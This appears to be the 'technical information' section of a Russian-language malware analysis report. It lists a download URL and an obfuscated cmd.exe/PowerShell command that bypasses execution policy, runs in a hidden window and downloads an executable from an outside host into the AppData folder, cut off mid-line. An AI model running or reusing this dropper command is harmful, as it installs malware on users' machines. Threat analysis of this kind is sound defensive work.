Техническая информация
- http://www.zonedopesa.top/read.php?=1.gi как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWERShell.eXE -exEcUtIONpoLicy bypass -NOPROilE -WiNDOWstyle HIDdEN (NeW-obJecT SYstEm.nET.WebCLienT).doWNLOaDFiLE('http://www.zonedopesa.top/read.php?=1.gi','%aPPDaTA%.eXe');s...
- '<SYSTEM32>\cmd.exe' /c "POWERShell.eXE -exEcUtIONpoLicy bypass -NOPROilE -WiNDOWstyle HIDdEN (NeW-obJecT SYstEm.nET.WebCLienT).doWNLOaDFiLE('http://www.zonedopesa.top/read.php?=1.gi','%aPPDaTA%.eXe');s...' (со скрытым окном)